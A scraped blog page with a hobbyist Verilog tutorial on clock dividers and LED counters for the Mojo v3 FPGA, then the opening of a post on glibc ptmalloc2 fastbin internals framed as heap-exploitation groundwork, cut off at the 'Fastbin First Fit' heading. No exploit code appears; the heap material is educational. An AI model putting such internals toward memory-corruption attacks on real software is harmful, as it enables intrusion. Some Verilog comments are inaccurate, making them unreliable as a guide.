<span style="font-family: "courier new" , "courier" , monospace;">always @ (posedge clk) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
This is an always section of Verilog code, it defines actions that happen "in tune" or according to certain changes with the specified <i>sensitivity</i> list in the brackets. This means that when the clock "clk" (<i>which is for all intents and purposes a square wave - see the example further down</i>), is registering a change from a 0 to 1 value this is called a positive edge, or <span style="font-family: "courier new" , "courier" , monospace;">posegde </span>in Verilog (the other one is called a <span style="font-family: "courier new" , "courier" , monospace;">negedge</span> or negative edge).<br />
<br />
So it essentially says in summary, when the clock changes from 0 to 1 always do this stuff. And it closes with an <span style="font-family: "courier new" , "courier" , monospace;">end </span>token of course.<br />
<br />
Next we have the assignment operation in side the always block:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"> external_led <= clk ^ external_led; </span><br />
<br />
This is called a non-blocking assignment[14]. This kind of assignment means if there are any assignments after it or before it (of this same kind "<="), they will all be assigned in parallel (<i>see [14] for an excellent explanation of the different pit falls and always block politics as well</i>).<i> Its kind of like attaching connectors to things from a source, if they are in parallel the electricity can be expected to be seen running down each connector at the same time</i>. The assignment gives <span style="font-family: "courier new" , "courier" , monospace;">external_led</span> the value of clk xor'd with the current value of external led. If you think it through, you'll see that this is a way to make it flip on and off not so? A good exercise is to try and write out the values.<br />
<br />
Okay so I mentioned this is a non-blocking assignment, does that mean there is another kind? YES! Guess what its called a <i>blocking assignment</i>! Here's what it looks like:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">// syntax [left operand] "=" [right operand]</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">external_led = clk ^ external_led;</span><br />
<br />
A dead plain "=" symbol is used. The way to remember this lies in understanding the header of an always where this assignment is allowed, here's a blocking always block:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">always @ (*) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> external_led = clk ^ external_led</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<br />
These always blocks, are for designing combinatorial logic circuits or logic gates (<i>literally AND, OR, XOR etc gates</i> ) they are great if you need to get really really low level, as in as base implementation of any digital logic as you'd like on the FPGA.<br />
<br />
To summarize:<br />
<ul style="text-align: left;">
<li><b>blocking</b> <span style="font-family: "courier new" , "courier" , monospace;">= </span>assignments are for <b>combinatorial logic</b> : Logic gates, where all statements take on their respective actions in parallel to each other.</li>
<li><b>non-blocking</b><span style="font-family: "courier new" , "courier" , monospace;"> <=</span> for <b>sequential logic</b> : statements potentially depend on a certain sequence to derive their values.</li>
</ul>
<br />
Anyway what I'm trying to say is blocking <span style="font-family: "courier new" , "courier" , monospace;">always</span> blocks are for combinatorial logic, non-blocking always blocks are for sequential logic or building registers - these are things that store information for us, we can chain them up in "sequences" and do useful things like building finite state machines! The reason I'm going with a non-block always block in the example, <i>and will most probably go with it in the real example too</i> - is because the on board led's on the Mojo are declared as <span style="font-family: "courier new" , "courier" , monospace;">reg</span>'s in Verilog- and we will modulate our clock speed using regs too! <i>You will run into a fair amount of frustration with this concept anyway - so just get used to wading out your problems with it, I don't think its a completely avoidable mistake hehe.</i><br />
<br />
You probably want to pick up a book on assignment operations, and constraints and practice them a bit (<i>I've tried to be as verbose as possible</i>). This is because one can immediately tell that this imposes major drama on which types are assignable to which types i.e. can you assign reg to wire? Its basically due to how it resolves different types to the board components and combinations of them mentioned above - if you give it something that works sequentially or is meant for non-storage options it can cause antagonisms that are annoying. <i>So be careful and try out stuff a lot, write some bad Verilog so you know what it looks like lol. </i><br />
<br />
Okay so that's pretty bare bones Verilog, you will probably be able to develop "valid" Verilog using this but to be able to compute on real things, real clocks and achieve actual interaction with real "hardware" you're going to need to learn how to divide the clock!<br />
<br />
<h2 style="text-align: left;">
Clock Divider Circuits and Blinking LEDs</h2>
<br />
I like starting with this because it will be an integral part of a lot of Verilog problems and problem solving strategies. We will most probably be sampling from a certain module at a given rate, clocking in data at given rates; you might need to run multiple different things at multiple different clock frequencies or be required to by certain protocols. So you shouldn't think of a clock as a single rhythm to dance your circuit to, instead see it as something consisting of beats you can skip, group together or chop up anyway you need (<i>within in physical bounds of course</i>) - <i>multiple loving tweets at different frequencies :) </i><br />
<br />
Here's a simple clock divider circuit in Verilog, this essentially drives the Mojo v3 boards on board <span style="font-family: "courier new" , "courier" , monospace;">led[0]</span> to follow a clock that flips on and off at half the frequency of the boards natural clock:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">module mojo_top( /*module declaration*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input clk, //clock input @ 50 MHz (according to ucf file)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input rst_n, //reset input </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> output [7:0]led //array of LEDs on the Mojo Board</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> );</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">wire rst = ~rst_n; // make reset active high</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reg [25:0] clk_div; //declare 25 bits worth of D-FlipFlop "storage"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">assign led[6:0] = 6'bz; //set the LEDs from 6 down to 7 to "off"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b>assign led[7] = clk_div[20];</b> //assign 20th bit in clk_div to led 0</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">always @ (posedge clk) begin //declare always block</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span><b>clk_div <= clk_div + 1;</b> //add one to the 25 bit array</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">endmodule</span><br />
<br />
And the user constraints file looks like this:<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">NET "clk" TNM_NET = clk;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">TIMESPEC TS_clk = PERIOD "clk" 50 MHz HIGH 50%;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;"># PlanAhead Generated physical constraints </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "clk" LOC = P56 | IOSTANDARD = LVTTL; //clock signal</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "rst_n" LOC = P38 | IOSTANDARD = LVTTL; //reset button</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<0>" LOC = P134 | IOSTANDARD = LVTTL; //on board led 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<1>" LOC = P133 | IOSTANDARD = LVTTL; //on board led 2</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<2>" LOC = P132 | IOSTANDARD = LVTTL; //and so forth...</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<3>" LOC = P131 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<4>" LOC = P127 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<5>" LOC = P126 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<6>" LOC = P124 | IOSTANDARD = LVTTL;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">NET "led<7>" LOC = P123 | IOSTANDARD = LVTTL;</span><br />
<div>
<br /></div>
<div>
Lets run through the code a bit. I need to cover this declaration:<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">reg [25:0] clk_div;</span><br />
<br />
This declares what is called a register. Now it doesn't mean that it simply stores values, it kind of just keeps a value until you give it another one. And whats also important to remember is that sometimes you can string up reg's that won't actually make it into the bit stream. Check out this awesome stack overflow answer:<br />
<br />
<pre style="background-color: #eff0f1; border: 0px; box-sizing: inherit; color: #242729; font-family: Consolas, Menlo, Monaco, "Lucida Console", "Liberation Mono", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", "Courier New", monospace, sans-serif; font-size: 13px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; max-height: 600px; overflow-wrap: normal; overflow: auto; padding: 5px; vertical-align: baseline; width: auto;"><code style="border: 0px; box-sizing: inherit; font-family: Consolas, Menlo, Monaco, "Lucida Console", "Liberation Mono", "DejaVu Sans Mono", "Bitstream Vera Sans Mono", "Courier New", monospace, sans-serif; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; white-space: inherit;">> Contrary to their name, regs don't necessarily correspond to
> physical registers. They represent data storage elements in
> Verilog/SystemVerilog. They retain their value till next value is
> assigned to them (not through assign statement). They can be
> synthesized to FF, latch or combinatorial circuit. (They might not be
> synthesizable !!!)</code></pre>
<br />
- (extract from: <a href="https://stackoverflow.com/questions/33459048/what-is-the-difference-between-reg-and-wire-in-a-verilog-module">https://stackoverflow.com/questions/33459048/what-is-the-difference-between-reg-and-wire-in-a-verilog-module</a> )<br />
<br />
Besides the other declarations and (already covered) always blocks, we see a input/output declaration mentioning :<br />
<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>input</b> clk</span> - the input clock signal (<i>pay attention to the User Constraints File to see how this is declared</i>). In our example it simply a slowed down version of the clock on the board.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>input</b> rst_n</span> - we don't actually use this just yet, its the input from the reset button on the Mojov3 Board; this is a great little "toggle" to have around. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;"><b>output</b> [7:0] led</span> - this is an array of reg's declared as output. I know they are reg's (registers) because of how they are elaborated in the User Constraints file namely: <span style="font-family: "courier new" , "courier" , monospace;">NET "rst_n" LOC = P38 | IOSTANDARD</span> meaning essentially <i>location P38 on the board should be a NET called rst_n</i>; </li>
</ul>
<div>
The NET type is essentially the type that allows driving form and to I/O blocks, check out this other awesome stackoverflow answer:</div>
<div>
<br /></div>
<blockquote class="tr_bq">
"The net data types can represent physical connections between structural entities, such as gates. A net shall not store a value (except for the trireg net). Instead, its value shall be determined by the values of its drivers, such as a continuous assignment or a gate."</blockquote>
<div>
<br /></div>
<div>
- <a href="https://stackoverflow.com/questions/9975415/what-does-net-stand-for-in-verilog">https://stackoverflow.com/questions/9975415/what-does-net-stand-for-in-verilog</a></div>
<div>
<br /></div>
<br />
The other interesting piece of code here are the reg declarations I added (<i>not outputs or inputs, just internal registers we need to store some of the clock flips</i>):<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">assign led[6:0] = 6'bz; </span><br />
<br />
This assigns 0 to the 6 bit positions from 7th (number 6) down to 0th which leaves 1 open, namely the 8th bit is set as:<br />
<br />
<b style="font-family: "Courier New", Courier, monospace;">assign led[7] = clk_div[20]; </b><br />
<br />
This assignment sets the 7th bit to the <span style="font-family: "courier new" , "courier" , monospace;">clk_div</span> array of registers 20th bit value. So i declared 25 bits and I'm taking the 20th one and making it always the same as <span style="font-family: "courier new" , "courier" , monospace;">led[7]</span>. The final piece of the puzzle is in the always block:<br />
<br />
<b style="font-family: "Courier New", Courier, monospace;">clk_div <= clk_div + 1;</b><br />
<br />
This adds 1 bit to the 25 bit value of <span style="font-family: "courier new" , "courier" , monospace;">clk_div</span>. <i>As far as I understand this</i>, it means that<span style="font-family: "courier new" , "courier" , monospace;"> clk_div </span>will add up and when whatever number its at has a "1" in the 20th bit position, the <span style="font-family: "courier new" , "courier" , monospace;">LED[1]</span> will turn on.<br />
<br />
If you think about how binary numbers add up you can see that this means it will slowly bubble up the bit values, floating the carry up the 25 bit places until it hits the 20th one. This is much slower than the raw clock, which flips up n down at 50Mhz <i>which is like a bajillion times a second your eyes won't even see the LED move its so fast</i>. So we basically tell the clock to add up its flips in a total and when we are happy with the amount we tell the LED to turn on! I hope that makes it easier to understand! What this means is obviously we can control how fast the LED appears to pulse, we can make it pules faster and slower, we can even make multiple LEDs on the board pulse at different rates if you want to give yourself a tension head ache lol but its fun!<br />
<br />
<h2 style="text-align: left;">
8 bit led counter and split counter</h2>
<br />
It can be abit hard to get examples If you understand how the <span style="font-family: "courier new" , "courier" , monospace;">clk_div</span> trick works then you essentially know how to build a counter already. All you need to do is make a counter for the led's. But there's one caveat, and that is again the issue of blinking the LED on and off too fast. To solve this we just divide the clock, and then add only when the <span style="font-family: "courier new" , "courier" , monospace;">clk_div[20]</span> reads a 1. If we then map the counter to the LEDs, jobs done!<br />
<br />
Here's the Verilog:<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">module mojo_top( /*module declaration*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input clk, //clock input @ 50 MHz (according to ucf file)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input rst_n, //reset input </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> output [7:0]led //array of LEDs on the Mojo Board</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> );</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">reg [25:0] clk_div;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reg [7:0] led_dff;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">assign led[7:0] = led_dff[7:0];</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">always @ (posedge clk) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>clk_div <= clk_div + 1;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>if (clk_div[20:0] == 0) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>led_dff <= led_dff + 1;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>if (rst) begin</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>led_dff <= 0;</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">endmodule</span><br />
<br />
You can also split up the counter by making the lower bits "add" up to the high bits like so:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">module mojo_top( /*module declaration*/</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input clk, //clock input @ 50 MHz (according to ucf file)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> input rst_n, //reset input </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> output [7:0]led //array of LEDs on the Mojo Board</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> );</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">wire rst = ~rst_n;</span><br />
<span style="font-family: Courier New, Courier, monospace;">reg [50:0] clk_div;</span><br />
<span style="font-family: Courier New, Courier, monospace;">reg [2:0] dff_1; //d-flip flop for led's</span><br />
<span style="font-family: Courier New, Courier, monospace;">reg [2:0] dff_2;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">assign led[1:0] = dff_1[2:0]; //assign first two bits</span><br />
<span style="font-family: Courier New, Courier, monospace;">assign led[3:2] = dff_2[2:0]; //assign second two bits </span><br />
<span style="font-family: Courier New, Courier, monospace;">assign led[6:4] = dff_1 + dff_2; //save total</span><br />
<span style="font-family: Courier New, Courier, monospace;">assign led[7] = clk_div[20];</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">always @ (posedge clk) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>clk_div <= clk_div + 1;</span><br />
<span style="white-space: pre;"><span style="font-family: Courier New, Courier, monospace;"> </span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>if (clk_div[24:0] == 0) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_1 <= dff_1 + 1;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>if (clk_div[27:0] == 0) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_2 <= dff_2 + 1;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>if (rst) begin</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_1 <= 0;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>dff_2 <= 0;</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="white-space: pre;"> </span>end</span><br />
<span style="font-family: Courier New, Courier, monospace;">end</span><br />
<span style="font-family: Courier New, Courier, monospace;">endmodule</span><br />
<br />
<br />
In this example I also made them add at different speeds you can of course make them all tick the same way but that would be kind of lame. Anyway that's it for this one, let me know if I got some stuff wrong, I'm going to keep posting about other boards n blinky lights. Stay tuned!</div>
<br />
<h2 style="text-align: left;">
Reading and References</h2>
<ol style="text-align: left;">
<li>Register Transfer Level (Wikipedia) - <a href="https://en.wikipedia.org/wiki/Register-transfer_level">https://en.wikipedia.org/wiki/Register-transfer_level</a> </li>
<li>Field Programmable Gate Array (Wikipedia) - <a href="https://en.wikipedia.org/wiki/Field-programmable_gate_array">https://en.wikipedia.org/wiki/Field-programmable_gate_array</a> </li>
<li>All about FPGAs - <a href="https://www.eetimes.com/document.asp?doc_id=1274496">https://www.eetimes.com/document.asp?doc_id=1274496</a></li>
<li>HyperPhysics : The D Flip Flop - <a href="http://hyperphysics.phy-astr.gsu.edu/hbase/Electronic/Dflipflop.html">http://hyperphysics.phy-astr.gsu.edu/hbase/Electronic/Dflipflop.html</a> </li>
<li>Logic Levels - <a href="https://learn.sparkfun.com/tutorials/logic-levels/all">https://learn.sparkfun.com/tutorials/logic-levels/all</a> </li>
<li>"What is the meaning of Active high and Active low in digital circuits" <a href="https://www.quora.com/What-is-the-meaning-of-active-low-and-active-high-in-digital-circuits-and-logic-design">https://www.quora.com/What-is-the-meaning-of-active-low-and-active-high-in-digital-circuits-and-logic-design</a> </li>
<li>Electronic Tutorials : The Multiplexer <a href="https://www.electronics-tutorials.ws/combination/comb_2.html">https://www.electronics-tutorials.ws/combination/comb_2.html</a> </li>
<li>Mojo V3 (Alchitry) - <a href="https://en.wikipedia.org/wiki/Field-programmable_gate_array">https://en.wikipedia.org/wiki/Field-programmable_gate_array</a> </li>
<li>Mojo V3 (SparkFun) - <a href="https://www.sparkfun.com/products/11953">https://www.sparkfun.com/products/11953</a> </li>
<li>Mojo V3 (Amazon) - <a href="https://www.amazon.com/Mojo-V3-FPGA-Development-Board/dp/B0752XX7G6">https://www.amazon.com/Mojo-V3-FPGA-Development-Board/dp/B0752XX7G6</a> </li>
<li>Verilog (Wikipedia) <a href="https://en.wikipedia.org/wiki/Verilog">https://en.wikipedia.org/wiki/Verilog</a> </li>
<li>IEEE Standard for Verilog Hardware Description Language : Standard 1364 <a href="https://www.eg.bucknell.edu/~csci320/2016-fall/wp-content/uploads/2015/08/verilog-std-1364-2005.pdf">https://www.eg.bucknell.edu/~csci320/2016-fall/wp-content/uploads/2015/08/verilog-std-1364-2005.pdf</a> </li>
<li>Verilog Module Structure (Wikibooks) <a href="https://en.wikibooks.org/wiki/Programmable_Logic/Verilog_Module_Structure">https://en.wikibooks.org/wiki/Programmable_Logic/Verilog_Module_Structure</a> </li>
<li>Verilog Always @ Blocks - <a href="https://class.ece.uw.edu/371/peckol/doc/Always@.pdf">https://class.ece.uw.edu/371/peckol/doc/Always@.pdf</a> </li>
<li>Introduction to Verilog - <a href="http://www.doe.carleton.ca/~jknight/97.478/PetervrlK.pdf">http://www.doe.carleton.ca/~jknight/97.478/PetervrlK.pdf</a> </li>
<li>Best Practices for FPGA Development - <a href="http://www.irtc-hq.com/wp-content/uploads/2015/04/Best-FPGA-Development-Practices-2014-02-20.pdf">http://www.irtc-hq.com/wp-content/uploads/2015/04/Best-FPGA-Development-Practices-2014-02-20.pdf</a> </li>
<li>Frequency Divider Circuit (Tutorials Point) <a href="https://www.youtube.com/watch?v=nL8u0YBhyWg">https://www.youtube.com/watch?v=nL8u0YBhyWg</a> </li>
<li>Modular Monthly: Clock dividers & multipliers (Future Music Magazine) - <a href="https://www.youtube.com/watch?v=ilo52K8Oje8">https://www.youtube.com/watch?v=ilo52K8Oje8</a> </li>
<li>Your first FPGA program (nandland) - <a href="https://www.nandland.com/vhdl/tutorials/tutorial-your-first-vhdl-program-part1.html">https://www.nandland.com/vhdl/tutorials/tutorial-your-first-vhdl-program-part1.html</a> </li>
<li>Xilinx Constraights Guide - <a href="http://www.fdi.ucm.es/profesor/mendias/DAS/docs/cgd.pdf">http://www.fdi.ucm.es/profesor/mendias/DAS/docs/cgd.pdf</a> </li>
<li>Altering the FPGA clock frequency of the Mojo (Smolloy.com) <a href="https://www.smolloy.com/2016/01/altering-the-fpga-clock-frequency-of-the-mojo/">https://www.smolloy.com/2016/01/altering-the-fpga-clock-frequency-of-the-mojo/</a> </li>
<li> Arty FPGA 01: Hello World with Verilog & Vivado - <a href="https://timetoexplore.net/blog/arty-fpga-verilog-01">https://timetoexplore.net/blog/arty-fpga-verilog-01</a></li>
<li><a href="https://www.edaplayground.com/">https://www.edaplayground.com/</a></li>
<li>LEARNING VERILOG FOR FPGAS: THE TOOLS AND BUILDING AN ADDER - <a href="https://hackaday.com/2015/08/19/learning-verilog-on-a-25-fpga-part-i/">https://hackaday.com/2015/08/19/learning-verilog-on-a-25-fpga-part-i/</a> </li>
<li>A Verilog HDL Test Bench Primer - <a href="https://people.ece.cornell.edu/land/courses/ece5760/Verilog/LatticeTestbenchPrimer.pdf">https://people.ece.cornell.edu/land/courses/ece5760/Verilog/LatticeTestbenchPrimer.pdf</a> </li>
<li>Icarus + GTK Wave Guide <a href="http://inf-server.inf.uth.gr/~konstadel/resources/Icarus_Verilog_GTKWave_guide.pdf">http://inf-server.inf.uth.gr/~konstadel/resources/Icarus_Verilog_GTKWave_guide.pdf</a></li>
<li><a href="http://iverilog.wikia.com/wiki/GTKWAVE">http://iverilog.wikia.com/wiki/GTKWAVE</a> </li>
<li>Verilog and Number Litreals - <a href="http://web.engr.oregonstate.edu/~traylor/ece474/beamer_lectures/verilog_number_literals.pdf">http://web.engr.oregonstate.edu/~traylor/ece474/beamer_lectures/verilog_number_literals.pdf</a> </li>
<li>What's the deal with Verilog's reg's and wires - <a href="https://blogs.mentor.com/verificationhorizons/blog/2013/05/03/wire-vs-reg/">https://blogs.mentor.com/verificationhorizons/blog/2013/05/03/wire-vs-reg/</a> </li>
</ol>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-88732944819995061982018-12-14T00:06:00.001-08:002018-12-14T00:06:26.218-08:00 Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection<div dir="ltr" style="text-align: left;" trbidi="on">
This post is part of a series, check out the others in the series here:<br />
<br />
<ol style="text-align: left;">
<li>Introduction to ptmalloc2 internals (Part 1) - <a href="https://blog.k3170makan.com/2018/11/glibc-heap-exploitation-basics.html">https://blog.k3170makan.com/2018/11/glibc-heap-exploitation-basics.html</a> </li>
<li>(this)</li>
</ol>
As I mentioned in the previous post the heap management will keep meta-data about the free chunks in case these chunks can be reallocated. To improve my language from the last post as well I should mention that there are different kinds of lists to manage different sizes of free chunks, namely:<br />
<br />
<ul style="text-align: left;">
<li><b>Unsorted Bin</b> - This is basically a list that is meant to temporarily hold any chunks that don't fit into the Fast, Large or Small bin categories. To quote some random persons paper about this:</li>
</ul>
<div>
<i>When freeing chunks not in
the range of fastbin, they are inserted into unsorted bin at
first rather than the small bins or large bins - </i><a href="https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf">https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf</a> </div>
<ul style="text-align: left;">
<li><b>Small bins</b> - again, as with many things this is just another list or group of lists for holding a particular size of free heap chunk. The threshold may vary per architecture and glibc implementation or even build. But the basic idea is that they are larger than Fast Bins but Smaller than Large Bins. <i> I will dig into these with fair amount of detail in future posts </i></li>
<li><b>Large Bins</b> - for chunks bigger than a maximum size, <i>they are pretty illusive to me at the moment so I'm going to leave these out for a later post as well. </i></li>
<li><b>Fast Bins</b> - the star of the show, for all free chunks in a range of sizes below a certain maximum (<i>more details to follow shortly!</i>) </li>
</ul>
<br />
Fastbin'd chunks are chosen to be covered here because they work as extensions to the base <span style="font-family: "courier new" , "courier" , monospace;">malloc_chunk</span> format used for plain old unsorted or "normal sized" heap chunks, and they offer a couple of cool tricks to try out as well! So no large chunks in this post just yet (<i>sorry about that</i>) - but I will give them a look once I get enough data ;) Anyway, on to fastbins!<br />
<br />
<h2 style="text-align: left;">
Fast Bin Format</h2>
<i>The fastbins are just a "chunk" yard of unloved memory</i><br />
<br />
Fastbins are reserved for small memory objects (<i>small structs and strings</i>). The idea is that if you are not using chunk sizes that will benefit from the usual compute overhead and accounting information; you just use a simple list of small memory regions that fit the size requested. Fastbins are according to some research present in the heap as a collection of different sizes of fast bins (so not just a single list is possible, multiple fastbins could be operating for each size group), to quote:<br />
<br />
"<i>Fastbin is a special design optimized for performance
and cache locality. It is a single linked list similar to look
aside table of Windows, in which free chunks of same size
are linked in a LIFO way.
Chunk size of different fastbins varies. There are [totally] 10 fastbins in an arena yet the first 7 are used by default,
ranging from 16 to 64 bytes on 32-bit systems or 32 to 128
bytes on 64-bit systems</i>" - <a href="https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf">https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf</a><br />
<br />
<br />
Another caveat is that fastbins are not coalesced if they are free'd; this is again to save spinning the wheels over such small regions. There's much more about fast bins in the documentation in <span style="font-family: "courier new" , "courier" , monospace;">glibc-[version]/malloc/malloc.c </span>is fantastic and I full suggest giving it a read through -<i> I'd hate to blindly copy it here. </i><br />
<br />
That's pretty much the opening blurb on fastbins lets get into what they look like and how they work.<br />
The size threshold defined for fastbins defined in<i> <a href="https://fossies.org/linux/glibc/malloc/malloc.c">malloc/malloc.c</a></i>: As it stands in glibc-2.23 its defined as <span style="font-family: "courier new" , "courier" , monospace;">MAX_FAST_SIZE</span> =<span style="font-family: "courier new" , "courier" , monospace;">(SIZE_SZ*80)/4</span>, which will evaluate to 80 bytes. So anything below 80 bytes will pretty much end up getting fast bin'd.<br />
<br />
To provide a good example of the format; here's a chain of fastbins in memory:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKpFnOnoTAGcQTCNu-k8w6ztlbgqHe5FCFGgZQHYzZmnkz0j5TR-USP-7djb2a_H2NPMMCkmqCiC8HgvZCKwNxPWnZFM6WTylQwpqMC6AGISRFP38H1iSnsPE2Q7fbAGThzn3i8I4S32M/s1600/allocatedVsFastbin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="757" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKpFnOnoTAGcQTCNu-k8w6ztlbgqHe5FCFGgZQHYzZmnkz0j5TR-USP-7djb2a_H2NPMMCkmqCiC8HgvZCKwNxPWnZFM6WTylQwpqMC6AGISRFP38H1iSnsPE2Q7fbAGThzn3i8I4S32M/s1600/allocatedVsFastbin.png" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I've grabbed an example screenshot here that also compares a non-fastbinned chunk, just a plain old chunk <span style="font-family: "courier new" , "courier" , monospace;">0xb0</span> bytes in size <i>(the first one allocated with a mem pointer at <span style="font-family: "courier new" , "courier" , monospace;">0x602010</span></i>) - this is to show the difference between formats a littler clearer.<br />
<br />
On the left you see the "live" fastbin'd chunks (<i>starting at the <span style="font-family: "courier new" , "courier" , monospace;">0x6020b0</span></i>) . Nothing really gives them away as fastbins in this state except for their sizes. On the right you will see the free'd fastbin'd chunks; a key thing to notice here is that they have a single back-pointer (<i>forming a linked list of fastbin chunks</i>) indicating where the next free fastbin'd chunk is.<br />
<br />
What you will notice as well is that we definitely have the case here that fastbin'd chunks next to each other in memory are free'd; but none of the size fields overlap or rather none of the chunks are joined together. As mentioned before they will not be coalesced.<br />
<br />
Okay so we know what they look like, lets talk about another important mechanism, the fastbin first fit.<br />
<h2 style="text-align: left;">
Fastbin First Fit</h2>
<br />
